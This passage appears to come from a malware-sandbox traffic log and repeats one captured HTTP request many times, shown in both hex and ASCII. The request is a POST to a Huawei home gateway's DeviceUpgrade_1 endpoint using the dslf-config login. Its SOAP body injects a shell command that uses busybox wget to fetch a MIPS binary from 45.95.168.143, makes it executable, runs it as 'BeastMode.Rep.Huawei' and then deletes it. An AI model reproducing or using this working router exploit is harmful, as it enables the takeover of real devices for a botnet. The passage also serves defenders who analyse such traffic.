75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 